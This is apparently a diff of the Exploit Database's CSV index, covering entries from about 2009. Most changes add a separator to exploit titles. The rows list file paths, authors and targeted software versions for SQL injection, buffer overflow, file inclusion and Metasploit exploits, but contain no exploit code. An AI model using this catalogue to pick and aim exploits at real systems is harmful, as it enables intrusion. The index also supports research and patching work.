Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 @@ -8516,7 +8516,7 @@ id,file,description,date,author,platform,type,port 9029,platforms/windows/dos/9029.rb,"VideoLAN VLC Media Player 0.9.9 smb:// URI Stack BoF PoC",2009-06-29,Trancer,windows,dos,0 9030,platforms/php/webapps/9030.txt,"Joomla Component com_K2 -q 1.0.1b - (category) SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 9031,platforms/windows/remote/9031.py,"Bopup Communications Server 3.2.26.5460 - Remote BoF Exploit (SEH)",2009-06-29,His0k4,windows,remote,19810 -9032,platforms/php/webapps/9032.txt,"osTicket 1.6 RC4 Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",php,webapps,0 +9032,platforms/php/webapps/9032.txt,"osTicket 1.6 RC4 - Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",php,webapps,0 9033,platforms/windows/dos/9033.pl,"SCMPX 1.5.1 - (.m3u) Local Heap Overflow PoC",2009-06-29,hack4love,windows,dos,0 9034,platforms/windows/local/9034.pl,"HT-MP3Player 1.0 - (.ht3) Local Buffer Overflow Exploit (SEH)",2009-06-29,hack4love,windows,local,0 9035,platforms/php/webapps/9035.txt,"Almnzm (COOKIE: customer) SQL Injection",2009-06-29,Qabandi,php,webapps,0 @@ -8535,7 +8535,7 @@ id,file,description,date,author,platform,type,port 9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection Exploit",2009-06-30,eLwaux,php,webapps,0 9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0 9052,platforms/php/webapps/9052.txt,"BIGACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 -9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0 +9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0 9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Remote Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 9056,platforms/php/webapps/9056.txt,"MDPro Module CWGuestBook 2.1 - SQL Injection",2009-06-30,Dante90,php,webapps,0 @@ -8545,7 +8545,7 @@ id,file,description,date,author,platform,type,port 9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 - (.plf) Universal Buffer Overflow Exploit (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 9061,platforms/windows/dos/9061.pl,"PEamp 1.02b - (.M3U) Local Buffer Overflow PoC",2009-07-01,"ThE g0bL!N",windows,dos,0 9062,platforms/php/webapps/9062.txt,"Messages Library 2.0 - Arbitrary Delete Message",2009-07-01,Stack,php,webapps,0 -9063,platforms/php/webapps/9063.txt,"Messages Library 2.0 Insecure Cookie Handling",2009-07-01,Stack,php,webapps,0 +9063,platforms/php/webapps/9063.txt,"Messages Library 2.0 - Insecure Cookie Handling",2009-07-01,Stack,php,webapps,0 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - (.lst / .m3u) Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0 9065,platforms/windows/remote/9065.c,"Green Dam Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0 @@ -8615,7 +8615,7 @@ id,file,description,date,author,platform,type,port 9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - (double ext) Remote Shell Injection Exploit",2009-07-13,StAkeR,php,webapps,0 9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash Exploit",2009-07-13,prodigy,windows,dos,0 9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - (ata device) Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0 -9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 Insecure Temp File Creation Root Exploit",2009-07-13,nofame,linux,local,0 +9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Root Exploit",2009-07-13,nofame,linux,local,0 9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 - (ListData.dat) Universal Buffer Overflow Exploit (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0 9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow Exploit",2009-07-13,Sberry,windows,remote,0 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0 @@ -8727,7 +8727,7 @@ id,file,description,date,author,platform,type,port 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection Exploit",2009-07-24,Coksnuss,php,webapps,0 9253,platforms/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 findText Unicode Parsing Crash Exploit",2009-07-24,Hong10,windows,dos,0 9254,platforms/php/webapps/9254.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (2)",2009-07-24,skys,php,webapps,0 -9255,platforms/php/webapps/9255.txt,"Clip Bucket 1.7.1 Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 +9255,platforms/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure Exploit",2009-07-24,Qabandi,php,webapps,0 9258,platforms/php/webapps/9258.txt,"Joomla Almond Classifieds 7.5 - (com_aclassf) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 @@ -8932,7 +8932,7 @@ id,file,description,date,author,platform,type,port 9466,platforms/windows/local/9466.pl,"Playlistmaker 1.51 - (.m3u) Local Buffer Overflow Exploit (SEH)",2009-08-18,blake,windows,local,0 9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - (.mp3) Local Buffer Overflow PoC",2009-08-18,Evil.Man,windows,dos,0 9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote BoF Exploit",2009-08-18,Wraith,windows,remote,69 -9469,platforms/php/webapps/9469.txt,"Ultimate Fade-in slideshow 1.51 Shell Upload",2009-08-18,"NeX HaCkEr",php,webapps,0 +9469,platforms/php/webapps/9469.txt,"Ultimate Fade-in slideshow 1.51 - Shell Upload",2009-08-18,"NeX HaCkEr",php,webapps,0 9470,platforms/php/webapps/9470.txt,"PHP Email Manager - (remove.php ID) SQL Injection",2009-08-18,MuShTaQ,php,webapps,0 9471,platforms/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",php,webapps,0 9472,platforms/php/webapps/9472.txt,"Best Dating Script Arbitrary Shell Upload",2009-08-18,jetli007,php,webapps,0 @@ -8952,7 +8952,7 @@ id,file,description,date,author,platform,type,port 9486,platforms/windows/local/9486.pl,"KSP 2006 FINAL - (.M3U) Universal Local Buffer Exploit (SEH)",2009-08-24,hack4love,windows,local,0 9487,platforms/windows/dos/9487.pl,"Faslo Player 7.0 - (.m3u) Local Buffer Overflow PoC",2009-08-24,hack4love,windows,dos,0 9488,platforms/freebsd/local/9488.c,"FreeBSD 6.1 - kqueue() NULL pointer Dereference Local Root Exploit",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0 -9489,platforms/multiple/local/9489.txt,"Multiple BSD Operating Systems setusercontext() Vulnerabilities",2009-08-24,kingcope,multiple,local,0 +9489,platforms/multiple/local/9489.txt,"Multiple BSD Operating Systems - setusercontext() Vulnerabilities",2009-08-24,kingcope,multiple,local,0 9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure",2009-08-24,"Khashayar Fereidani",php,webapps,0 9491,platforms/php/webapps/9491.txt,"Dow Group - (new.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0 9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional - Local Kernel Buffer Overflow Exploit",2009-08-24,Heurs,windows,local,0 @@ -9029,7 +9029,7 @@ id,file,description,date,author,platform,type,port 9566,platforms/php/webapps/9566.txt,"Kingcms 0.6.0 - (menu.php) Remote File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 9567,platforms/windows/local/9567.pl,"Hamster Audio Player 0.3a - (Associations.cfg) Local Buffer Exploit (SEH) (1)",2009-09-01,"ThE g0bL!N",windows,local,0 9568,platforms/windows/local/9568.py,"akPlayer 1.9.0 - (.plt) Universal Buffer Overflow Exploit (SEH)",2009-09-01,TiGeR-Dz,windows,local,0 -9569,platforms/php/webapps/9569.txt,"phpBB3 addon prime_quick_style GetAdmin",2009-09-01,-SmoG-,php,webapps,0 +9569,platforms/php/webapps/9569.txt,"phpBB3 - addon prime_quick_style GetAdmin",2009-09-01,-SmoG-,php,webapps,0 9570,platforms/php/webapps/9570.txt,"Ve-EDIT 0.1.4 - (debug_php.php) Local File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 9571,platforms/php/webapps/9571.txt,"Joomla Component com_gameserver 1.0 - (id) SQL Injection",2009-09-01,v3n0m,php,webapps,0 9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 dle_config_api Remote File Inclusion",2009-09-01,Kurd-Team,php,webapps,0 @@ -9092,7 +9092,7 @@ id,file,description,date,author,platform,type,port 9631,platforms/php/webapps/9631.txt,"iDesk - (download.php cat_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9632,platforms/php/webapps/9632.txt,"Accommodation Hotel Booking Portal - (hotel_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9633,platforms/php/webapps/9633.txt,"Bus Script (sitetext_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 -9634,platforms/php/webapps/9634.txt,"Adult Portal escort listing (user_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +9634,platforms/php/webapps/9634.txt,"Adult Portal escort listing - (user_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - (admin_news_bot.php) Remote File Inclusion",2009-09-10,"EA Ngel",php,webapps,0 9636,platforms/php/webapps/9636.txt,"An image gallery 1.0 - (navigation.php) Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injection",2009-09-10,"Salvatore Fresta",php,webapps,0 @@ -9194,13 +9194,13 @@ id,file,description,date,author,platform,type,port 9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 < 0.812.1 - Local File Inclusion",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 9802,platforms/windows/remote/9802.html,"IBM Installation Manager 1.3.0 iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0 9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0 -9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server 5.8.0 DoS (Metasploit)",2009-11-10,zhangmc,windows,dos,21 +9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server 5.8.0 - DoS (Metasploit)",2009-11-10,zhangmc,windows,dos,21 9805,platforms/windows/remote/9805.html,"Oracle Document Capture BlackIce DEVMODE Exploit",2009-09-29,pyrokinesis,windows,remote,0 9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 - Remote file creation PoC",2009-09-29,pyrokinesis,windows,dos,0 9807,platforms/windows/local/9807.txt,"Adobe Photoshop Elements 8.0 - Active File Monitor Privilege Escalation",2009-09-29,pyrokinesis,windows,local,0 9809,platforms/asp/webapps/9809.txt,"HEAT Call Logging 8.01 - SQL Injection",2009-09-28,"0 0",asp,webapps,0 9810,platforms/windows/remote/9810.txt,"EnjoySAP 6.4 / 7.1 - File Overwrite",2009-09-28,sh2kerr,windows,remote,0 -9811,platforms/windows/dos/9811.py,"Core FTP Server 1.0 build 304 DoS",2009-09-28,Dr_IDE,windows,dos,21 +9811,platforms/windows/dos/9811.py,"Core FTP Server 1.0 build 304 - DoS",2009-09-28,Dr_IDE,windows,dos,21 9812,platforms/php/webapps/9812.txt,"Joomla IRCm Basic - SQL Injection",2009-09-28,kaMtiEz,php,webapps,0 9813,platforms/windows/remote/9813.txt,"Mereo Web Server 1.8 - Remote Source Code Disclosure",2009-09-25,Dr_IDE,windows,remote,80 9814,platforms/windows/remote/9814.py,"CDBurnerXP 4.2.4.1351",2009-09-25,Dr_IDE,windows,remote,0 @@ -9215,7 +9215,7 @@ id,file,description,date,author,platform,type,port 9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd DoS",2009-09-24,"Jeremy Brown",solaris,dos,0 9824,platforms/php/webapps/9824.txt,"Swiss Mango CMS - SQL Injection",2009-09-24,kaMtiEz,php,webapps,0 9825,platforms/php/webapps/9825.txt,"e107 0.7.16 Referer header xss",2009-09-24,MustLive,php,webapps,0 -9826,platforms/php/webapps/9826.txt,"MindSculpt CMS SQL Injection",2009-09-24,kaMitEz,php,webapps,0 +9826,platforms/php/webapps/9826.txt,"MindSculpt CMS - SQL Injection",2009-09-24,kaMitEz,php,webapps,0 9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / XSS",2009-09-23,"Alexey Sintsov",php,webapps,0 9829,platforms/multiple/remote/9829.txt,"nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80 9830,platforms/php/webapps/9830.txt,"Cour Supreme SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0 @@ -9249,9 +9249,9 @@ id,file,description,date,author,platform,type,port 9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 9861,platforms/unix/webapps/9861.rb,"Nagios3 statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0 9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote,0 -9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 xss",2009-10-14,"Ryan Dewhurst",php,webapps,0 +9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 - XSS",2009-10-14,"Ryan Dewhurst",php,webapps,0 9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7-9 - U3D BoF",2009-10-27,"Felipe Andres Manzano",windows,local,0 -9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 BoF",2009-10-29,Dr_IDE,windows,local,0 +9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 - BoF",2009-10-29,Dr_IDE,windows,local,0 9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 folder disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file DoS",2009-10-27,Dr_IDE,windows,dos,0 9872,platforms/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0 @@ -9260,7 +9260,7 @@ id,file,description,date,author,platform,type,port 9875,platforms/php/webapps/9875.txt,"CubeCart 4 Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps,0 9876,platforms/php/webapps/9876.txt,"DedeCMS 5.1 - SQL Injection",2009-10-14,"Securitylab Security Research",php,webapps,0 9877,platforms/asp/webapps/9877.txt,"DWebPro command injection",2009-10-17,"Rafael Sousa",asp,webapps,0 -9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 DoS",2009-10-20,"bellick ",windows,dos,7144 +9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - DoS",2009-10-20,"bellick ",windows,dos,7144 9880,platforms/php/webapps/9880.txt,"Endonesia CMS 8.4 - Local File Inclusion",2009-11-04,s4r4d0,php,webapps,0 9881,platforms/windows/dos/9881.txt,"Eureka Mail Client 2.2q PoC BoF",2009-10-23,"Francis Provencher",windows,dos,110 9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0 @@ -9281,7 +9281,7 @@ id,file,description,date,author,platform,type,port 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 Root folder disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0 9900,platforms/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0 9901,platforms/linux/dos/9901.txt,"nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - PoC",2009-10-23,"Zeus Penguin",linux,dos,80 -9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 BoF",2009-10-26,"karak0rsan, murderkey",windows,remote,80 +9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - BoF",2009-10-26,"karak0rsan, murderkey",windows,remote,80 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - XSS / SQL injection",2009-10-20,"Amol Naik",php,webapps,0 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521 @@ -9294,7 +9294,7 @@ id,file,description,date,author,platform,type,port 9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25 9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783 9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632 -9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 Command Execution (Metasploit)",2009-02-25,patrick,multiple,webapps,0 +9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,multiple,webapps,0 9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT - Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23 9918,platforms/solaris/remote/9918.rb,"Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23 9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow (Metasploit)",2008-10-14,"Adriano Lima",solaris,remote,111 @@ -9310,7 +9310,7 @@ id,file,description,date,author,platform,type,port 9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client 5.3.3 - Type 77 Overflow (OS X) (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X) (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 -9933,platforms/php/webapps/9933.txt,"PHP168 6.0 Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 +9933,platforms/php/webapps/9933.txt,"PHP168 6.0 - Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690 9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 @@ -9332,12 +9332,12 @@ id,file,description,date,author,platform,type,port 9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306 9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Privilege Escalation",2009-10-20,trompele,hardware,local,0 -9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0 +9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 - DoS",2009-10-14,"Townsend Harris",hardware,dos,0 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0 9958,platforms/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - XSS / information disclosure",2009-10-15,antisnatchor,jsp,webapps,0 -9961,platforms/php/webapps/9961.txt,"phpCMS 2008 file disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0 +9961,platforms/php/webapps/9961.txt,"phpCMS 2008 - file disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0 16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistant XSS",2011-01-17,Penguin,php,webapps,0 -9962,platforms/php/webapps/9962.txt,"Piwik 1357 2009-08-02 file upload and code execution",2009-10-19,boecke,php,webapps,0 +9962,platforms/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - file upload and code execution",2009-10-19,boecke,php,webapps,0 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0 9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 store() SQL injection",2009-10-26,bookoo,php,webapps,0 9965,platforms/php/webapps/9965.txt,"RunCMS 2ma post.php SQL injection",2009-10-26,bookoo,php,webapps,0 @@ -9352,7 +9352,7 @@ id,file,description,date,author,platform,type,port 9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter - Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - XSS / CSR",2009-11-16,"Alexey Sintsov",hardware,webapps,80 9978,platforms/php/webapps/9978.txt,"TwonkyMedia Server 4.4.17 / 5.0.65 - XSS",2009-10-23,"Davide Canali",php,webapps,0 -9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 file disclosure",2009-10-22,"Janek Vind",php,webapps,0 +9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 - file disclosure",2009-10-22,"Janek Vind",php,webapps,0 9980,platforms/hardware/dos/9980.txt,"Websense Email Security - DoS",2009-10-20,"Nikolas Sotiriu",hardware,dos,0 9981,platforms/hardware/webapps/9981.txt,"Websense Email Security xss",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 m3u file Buffer Overflow",2009-10-16,"Dragon Rider",windows,local,0 @@ -9361,8 +9361,8 @@ id,file,description,date,author,platform,type,port 14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial Of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0 -9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote",2009-11-09,"Felipe Andres Manzano",multiple,local,0 -9991,platforms/windows/local/9991.txt,"AlleyCode 2.21 SEH Overflow PoC",2009-10-05,"Rafael Sousa",windows,local,0 +9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat - .U3D File Invalid Array Index Remote",2009-11-09,"Felipe Andres Manzano",multiple,local,0 +9991,platforms/windows/local/9991.txt,"AlleyCode 2.21 - SEH Overflow PoC",2009-10-05,"Rafael Sousa",windows,local,0 9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy ActiveX Control Remote code execution",2009-10-01,Trotzkista,windows,remote,0 9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0 @@ -9421,7 +9421,7 @@ id,file,description,date,author,platform,type,port 10053,platforms/windows/remote/10053.txt,"httpdx 1.4 Get Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80 10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - XSS",2009-07-04,sh2kerr,hardware,remote,80 -10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 imgsrv.exe Buffer Overflow",2009-10-07,blake,windows,remote,1235 +10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 - imgsrv.exe Buffer Overflow",2009-10-07,blake,windows,remote,1235 10057,platforms/php/webapps/10057.txt,"Aiocp 1.4.001 - File Inclusion",2009-10-07,"Hadi Kiamarsi",php,webapps,0 10058,platforms/php/webapps/10058.pl,"Joomla Recerca component - SQL Injection",2009-10-07,"Don Tukulesto",php,webapps,0 10059,platforms/jsp/webapps/10059.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure",2009-11-12,"Daniel King",jsp,webapps,0 @@ -9443,7 +9443,7 @@ id,file,description,date,author,platform,type,port 10078,platforms/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0 10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser Remote command execution",2009-10-01,pyrokinesis,windows,remote,0 33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0 -33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 +33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 - 'calpath' Parameter Remote File Inclusion",2010-01-07,Saywhat,php,webapps,0 33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 < 7.4_ Sentinel Keys Server 1.0.3 < 1.0.4 - Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002 33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 @@ -9482,11 +9482,11 @@ id,file,description,date,author,platform,type,port 10165,platforms/php/webapps/10165.txt,"TelebidAuctionScript(aid) Blind SQL Injection",2009-11-17,"Hussin X",php,webapps,0 10166,platforms/asp/webapps/10166.txt,"ActiveTrade 2.0 - (default.asp) Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0 10167,platforms/asp/webapps/10167.txt,"ActiveBids - (default.asp) Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0 -10168,platforms/php/webapps/10168.txt,"Shoutbox 1.0 HTML / XSS Injection",2009-11-18,SkuLL-HackeR,php,webapps,0 +10168,platforms/php/webapps/10168.txt,"Shoutbox 1.0 - HTML / XSS Injection",2009-11-18,SkuLL-HackeR,php,webapps,0 10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0 10170,platforms/multiple/webapps/10170.txt,"Xerver 4.31 / 4.32 - HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80 10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 - found Denial of Service (0Day)",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80 -10176,platforms/windows/dos/10176.txt,"HP Openview NNM 7.53 Invalid DB Error Code",2009-11-17,"Core Security",windows,dos,0 +10176,platforms/windows/dos/10176.txt,"HP Openview NNM 7.53 - Invalid DB Error Code",2009-11-17,"Core Security",windows,dos,0 10177,platforms/php/webapps/10177.txt,"Joomla Extensions iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps,0 10178,platforms/php/webapps/10178.txt,"Joomla / Mambo Component com_ezine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0 